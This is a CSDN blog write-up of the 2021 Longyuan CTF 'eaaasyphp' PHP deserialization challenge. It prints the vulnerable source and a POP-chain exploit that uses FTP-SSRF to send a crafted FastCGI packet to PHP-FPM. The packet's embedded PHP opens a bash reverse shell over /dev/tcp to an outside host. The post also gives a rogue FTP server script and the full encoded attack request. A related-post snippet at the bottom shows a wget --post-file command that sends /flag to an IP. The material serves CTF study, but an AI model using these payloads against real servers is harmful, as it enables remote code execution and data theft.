2021 陇原战“疫”杯 eaaasyphp wp

最新推荐文章于 2022-02-25 17:24:55 发布
最新推荐文章于 2022-02-25 17:24:55 发布
阅读量395 收藏 1
点赞数 3
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/121193552
版权
本文探讨了如何通过设置静态变量并触发`__wakeup`魔术方法,在PHP代码中利用FastCGI服务器的漏洞,执行FTP-SSRF攻击并控制FPM进程。作者详细展示了如何构造恶意payload,利用Esle和Bypass类进行链式调用,最终实现命令执行获取flag。
摘要由CSDN通过智能技术生成

eaaasyphp

<?php

class Check {
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    public function __wakeup()
    {
        Check::$str1 = true;
    }
}


class Hint {

    public function __wakeup(){
        $this->hint = "no hint";
    }

    public function __destruct(){
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }  
    }
}


class Bunny {

    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}

class Welcome {
    public function __invoke()
    {
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {

    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } else {
            throw new Error("Error");
        }
    }
}

if (isset($_GET['code'])) {
    unserialize($_GET['code']);
} else {
    highlight_file(__FILE__);
}

这里设置了两个static所以得先让他们为true才能继续进行,逻辑很清楚,构造链子

<?php

class Esle
{
}

class Hint
{
    public function __construct()
    {
        $this->hint = "phpinfo";
    }
}


class Bunny
{
    public function __construct()
    {
        $this->filename = "ftp://bbb@xxx:39021/aaa";
        $this->data = urldecode("%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/xxxxx/5000%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00");
    }
}

class Welcome
{
    public function __construct()
    {
        $this->username = new Bunny();
    }
}

class Bypass
{

    public function __construct()
    {
//        $this->str4 = 'phpinfo';
        $this->str4 = new Welcome();
    }
}

//echo urlencode(serialize(new Hint()));
echo urlencode(serialize(array(new Esle(), new Bypass())));

之前试过直接写还有各种方法,估计是没有权限根本写不上,但是还可以利用FTP - SSRF 来攻击 FPM/FastCGI造成命令执行
参考文章:浅入深出 Fastcgi 协议分析与 PHP-FPM 攻击方法
首先使用 gopherus 生成payload:
请添加图片描述然后在VPS上创建一个这样的py脚本

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))//端口号修改为VPS内ftp被动模式的端口号,比如我是39021
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9001)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

运行该脚本,
再开一个监听
请添加图片描述
然后hackbar发送生成好的payload

code=a%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7Di%3A1%3BO%3A6%3A%22Bypass%22%3A1%3A%7Bs%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A31%3A%22ftp%3A%2F%2Fbbb%40xxx%3A39021%2Faaa%22%3Bs%3A4%3A%22data%22%3Bs%3A413%3A%22%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo+%2F+fcgiclient+%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP%2F1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include+%3D+On%0Adisable_functions+%3D+%0Aauto_prepend_file+%3D+php%3A%2F%2Finput%0F%17SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%0D%01DOCUMENT_ROOT%2F%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp+system%28%27bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2Fxxx%2F5000+0%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00%22%3B%7D%7D%7D%7D

反弹成功,执行命令获取flag
请添加图片描述

Sapphire037
关注
专栏目录
2021陇剑网络安全大赛wp-webshell部分(详细题解)
偷一个月亮
09-15 6741
3.1 3.2 其中web根目录可以再system命令中看到 3.3 3.4 3.5 写frpc配置文件,推测为frpc,正确 实际上传动作为 L3Zhci93d3cvaHRtbC9mcnBj解码base64即为/var/www/html/frpc 3.6 3.5中写配置动作,hex转字符后,如下 3.7 同上 ...
2021陇原战
hezhing
12-08 298
2021陇原战役 可惜只做了一个密码学。还是用软件直出的。我真垃圾。赛后复盘。 参考链接 2021陇原战WP - n03tAck MISC soEasyCheckin 打开是一串加密。看编码是base32加密。解码发现是e开头,后面有5位的hex加密。但这里有个没解出来。根据前后可以推测为e。替换以后hex解密。 hex解密为社会主义核心价值观,但这里有个文明的文被替换掉了。这里换回去解密。 解密得到flag: SET{Qi2Xin1Xie2Li4-Long3Yuan2Zhan4Yi4} 打败
[陇原战2021网络安全大赛]eaaasyphp
cosmoslin的博客
11-11 3158
eaaasyphp <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Hint { public function __wakeup(){ $this-&gt
陇原 eaaasyphp
weixin_45751765的博客
11-24 4012
0x00 前言 比赛的时候一会写出个pop链,一发就500直接崩溃 后面才知道没有写权限也会这样(一开始以为自己????????链子写错了—) 看了师傅们的wp才知道还是自己太菜???? 知识点:FTP SSRF 打穿内网 0x01 复现 贴上源码和师傅的精简pop 学习一下别人的链子为什么写的比你好?! <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle
陇原战”EazyReWP
weixin_53622248的博客
11-08 169
陇原战”EazyReWP 吐个槽: ​ 晚了半个小时左右开始打的比赛,eazyre已经被20多解出了,最后二百多解出,然后下午放了个只改了一个数据的EasyRE_Revenge,不到20解出,emmm,不想说啥。 进入IDA 发现读入input后进行了一个加密操作得到一个新的串和目标串比较,所以进入sub_311406查看。 sub311406 进行一次函数跳转后到了这个函数,发现栈帧有异常,看了半天也没看出来这是做了什么操作,但可以肯定的是一定通过这些奇怪操作让函数执行到了其他地方,于是这里我选
BUUCTF web部分writeup
西部壮仔的博客
04-03 1819
持续更新 [MRCTF2020]你传你????呢 很显然这是一道文件上传题,我们直接上传一个webshell.php 好像不行过滤了,我们抓一下包。猜测是验证文件的后缀,我们把文件后缀名php改成jpg emmmm,发现还是不行,修改一下Content-Type,修改成image/jpeg 后缀名再修改为php发现不能上传,猜测应该是验证了Content-type和文件的后缀名,我们爆破一下看看过滤了哪...
两道CTF题--FTP被动模式打php-fpm
unexpectedthing的博客
02-25 1765
文章目录[陇原战2021网络安全大赛]eaaasyphp考点思路总结解题先看phpinfo():我们先尝试写入shellFTP的被动模式打FastCGI蓝帽2021 One Pointer PHP考点php数组溢出命令执行拿webshell方法1:绕过open_basedir利用未授权打FPM RCE加载恶意so文件开启FTP服务器上传文件处理伪造恶意FastCGI请求流程SUID提权总结方法2:步骤:原理: [陇原战2021网络安全大赛]eaaasyphp 考点 反序列化–pop链的构成 F
2021陇剑线下赛题目
04-10
守护数字安全,构建清朗空间!首届“陇剑”网络安全大赛,全国首次“以防为主”的网络安全大赛。
2021陇剑部分wp
hezhing
11-03 1255
2021陇剑 全是流量分析。麻了。只做了一部分。 参考链接 陇剑 个人 ’WriteUp‘-魔法少女雪殇 (snowywar.top) 陇剑Writeup(部分) - 惊觉 (leheavengame.com) 1.签到 题目描述: 网关小王在上网途中发现自己的网络访问异常缓慢,于是对网络出口捕获了流量,请您分析流量后进行回答: 1.1:     #### 题目:     此时正在进行的可能是http 协议的网络攻击。
2021年指挥官能源互联网主动防御安全技能大赛晋级赛真题 wp 解题思路
08-17
2021年指挥官能源互联网主动防御安全技能大赛晋级赛真题 WP 解题思路 本资源为2021年指挥官能源互联网主动防御安全技能大赛晋级赛真题的 WP 解题思路,涵盖了四个题目,分别为蓝01-取证、蓝02-取证、蓝03-取证...
陇原战“ CTF web writeup
weixin_44502336的博客
11-08 3619
eaaasyphp 这道题折磨死我了。首先是看到一段很简单的pop链,很简单,很开心,啪的一下很快啊,就造出了链子。 <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Bypass { pu
2021 陇原 WriteUp
mumuzi的博客
11-08 6071
希望情早日结束 注:打*的是赛后出的 总wp等待南神传了之后贴上战队wp链接 Misc soEasyCheckin base32,但有问题,倒数出现了0$,0–>O,$—>S,得到一串hex。 结果hex那里又有问题,具体是出在83¥6988ee这里 根据规律,每6个字节的第1个字节为e,然后把¥替换成e 得到社会主义核心价值观编码,但是还是有个地方是错误的,中间有一段为:和谐斃明平 然后把他那个斃随便改一下,我改的“富强” 解码得到的SET{Qi2Xin1Xie2Li4-Long3Yuan.
陇原战web部分wp
fmyyy1的博客
11-08 874
web CheckIN 下载源码,看到这里 这里调用wget,并且参数可控,可以直接外带数据,查看绑定路由 尝试访问/wget?argv=1 这里应该是出题人失误,无需登录可直接访问,利用–post-file参数直接外带文件 payload /wget?argv=fmyyy&argv=--post-file&argv=/flag&argv=http://124.70.40.5:1234 服务器开个监听直接打就行 eaaasyphp 反序列化,有个file_put_conten
5. 函数
weixin_41547423的博客
11-11 1453
1. 函数基础阶段 1. 函数的作用 需求:用户到ATM机取钱: 输入密码后显示"选择功能"界面 查询余额后显示"选择功能"界面 取2000钱后显示"选择功能"界面 特点:显示“选择功能”界面需要重复输出给用户,怎么实现? 函数就是将一段具有独立功能的代码块 整合到一个整体并命名,在需要的位置调用这个名称即可完成对应的需求。 函数在开发过程中,可以更高效的实现:代码重用。 2. 函数的使用步骤 2.1 定义函数 def 函数名(参数): 代码1 代码2 ......
IDF-CTF-天罗地网
saltor
04-19 8437
不难不易的js加密题目:就是这里 → http://ctf.idf.cn/game/web/28点击链接,弹出一个输入框。要求输入flag。查看源代码,发现一个script脚本。 然后复制到站长工具js混淆加密压缩那里解密。 http://tool.chinaz.com/js.aspx得到解密后的代码:var a = prompt("\u8f93\u5165\u4f60\u7684\x66\x6
健身房管理系统代码系统 Springboot健身房管理系统(程序,中文注释)
最新发布
09-26
健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统 1、资源说明:健身房管理系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、M
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
09-26
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
电池镍片自动检测设备_三维3D设计图纸.zip
09-26
电池镍片自动检测设备_三维3D设计图纸.zip
小微园区数字化建设方案.pptx
09-26
小微园区数字化建设方案
2021陇剑线下赛 wp
09-02
2021陇剑线下赛wp指的是该比赛的胜利方案(Winning Proposal)。这个问题的答案取决于具体的比赛和题目,因此我无法提供具体的场景和情况。不过,我可以向你介绍一些常见的比赛wp示例,帮助你理解wp的含义。 通常...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值